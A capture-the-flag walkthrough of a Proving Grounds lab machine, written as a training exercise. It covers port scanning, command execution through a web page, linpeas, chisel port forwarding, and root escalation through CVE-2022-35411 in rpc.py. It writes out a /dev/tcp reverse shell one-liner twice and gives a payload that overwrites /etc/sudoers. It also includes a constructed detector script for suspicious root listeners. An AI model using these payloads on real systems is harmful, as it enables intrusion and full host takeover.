Easy initial foothold. There is only one flag on this box, and it belongs to root. For root, look closely at the service running on the machine.
Enumeration
sudo nmap -p- $ip -Pn -vv -sS -A --open -T 4 -oN nmap-sS.txt
Ports 22 and 8000 are open.
Port 8000
Port 8000 is running an HTTP server. Browse to the website.
It seems we can run any command here; if you want, you can get a reverse shell straight from this page: sh -i >& /dev/tcp/$KaliIP/80 0>&1
Since the uid is 1000 and there is no flag in the home directory, I believe the only flag belongs to root, so I decided to enumerate potential privilege escalation paths from here.
#transfer linpeas from kali to target machine
#At kali where linpeas.sh located
python3 -m http.server 80
#At target machine
curl http://$KaliIP/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
From the linpeas result, we notice a local port, 65432, that did not show up in the nmap scan.
However, we did not know what service was running on it. We tried reverse port forwarding via chisel and scanning the port with nmap, but still could not tell what service it was.
If you are interested in trying the reverse port forwarding, you can download chisel here, or you can skip to the privilege escalation part. Make sure both machines run the same chisel version. A port forwarding cheat sheet can be found here. To forward the individual port, follow the steps below.
#At kali machine; --port is the port the chisel client connects to on the chisel server, you may use any port you like
/Path/to/chisel server --reverse --port 51234
#At target machine; the chisel binary must first be transferred to the target machine
/Path/to/chisel client $KaliIP:51234 R:65432:127.0.0.1:65432
#R:65432 is the port to bind on kali, and 127.0.0.1:65432 is the local port on the target you wish to forward
#If the connection succeeds, you should see "session created" on the kali machine
Then you can simply run nmap -p 65432 127.0.0.1 -A on kali to enumerate the port, as shown below.
Privilege Escalation
From the linpeas result, we also notice root running something unusual.
Why do we say it is unusual?
Because it is located in /opt, and /opt is intended to hold additional (optional) software and packages that are not part of the default installation, so a root process launched from there deserves a closer look.
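The two linpeas findings above (a loopback-only listener that an external scan cannot see, and a root process started from /opt) are exactly what a defender auditing a host should correlate. The added script below is not part of the original walkthrough or the target machine: it parses constructed sample output shaped like ss -lntp and ps -eo pid,user,args, and flags root-owned listeners that are bound only to loopback or launched from a watched directory. The sample lines, the /opt/rpc.py path and the port are constructed to mirror the box.

```python
import re

# Constructed sample modelled on `ss -lntp` output (not captured from the real machine).
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    0.0.0.0:8000        0.0.0.0:*         users:(("python3",pid=1105,fd=4))
LISTEN 0      5      127.0.0.1:65432     0.0.0.0:*         users:(("python3",pid=901,fd=3))
"""

# Constructed sample modelled on `ps -eo pid,user,args --no-headers` (not real output).
PS_OUTPUT = """\
  812 root     /usr/sbin/sshd -D
  901 root     /usr/bin/python3 /opt/rpc.py
 1105 www-data /usr/bin/python3 /var/www/app.py
"""

# Matches a LISTEN row and captures local address, port, process name and pid.
SS_RE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)')

LOOPBACK = ('127.0.0.1', '::1', '[::1]')

def parse_listeners(ss_text):
    """Return (local_addr, port, pid) for every LISTEN row with a process attached."""
    rows = []
    for line in ss_text.splitlines():
        m = SS_RE.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)), int(m.group(4))))
    return rows

def parse_processes(ps_text):
    """Map pid -> (user, full command line)."""
    procs = {}
    for line in ps_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3:
            procs[int(parts[0])] = (parts[1], parts[2])
    return procs

def suspicious_listeners(ss_text, ps_text, watch_dirs=('/opt/',)):
    """Flag root-owned listeners that are loopback-only or started from a watched directory."""
    procs = parse_processes(ps_text)
    hits = []
    for addr, port, pid in parse_listeners(ss_text):
        user, argv = procs.get(pid, ('?', '?'))
        local_only = addr in LOOPBACK
        odd_path = any(d in argv for d in watch_dirs)
        if user == 'root' and (local_only or odd_path):
            hits.append({'port': port, 'pid': pid, 'argv': argv,
                         'local_only': local_only, 'odd_path': odd_path})
    return hits
```

On the sample data only the 127.0.0.1:65432 listener run by root from /opt/rpc.py is flagged; sshd is root but world-facing and from /usr/sbin, and the port 8000 app is not root.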
Let's check on rpc.py. We notice it is running an RPC service on local port 65432. Googling "rpc.py exploit" turns up CVE-2022-35411.
Since rpc.py is run by root, exploiting the vulnerability gives us a root shell.
Looking at the exploit, we need to change the exec_command call to whatever command we want, then run the exploit on the target machine. So I changed it to exec_command('echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers')
You may change it to whichever payload you want, for example sh -i >& /dev/tcp/$KaliIP/80 0>&1. Transfer the exploit to the target machine, chmod +x exploit.py and execute it.
Congratz!! I hope you learned something from this walkthrough. Check out my stories for other Proving Grounds machine walkthroughs, and leave a comment if you found another way to pwn this machine.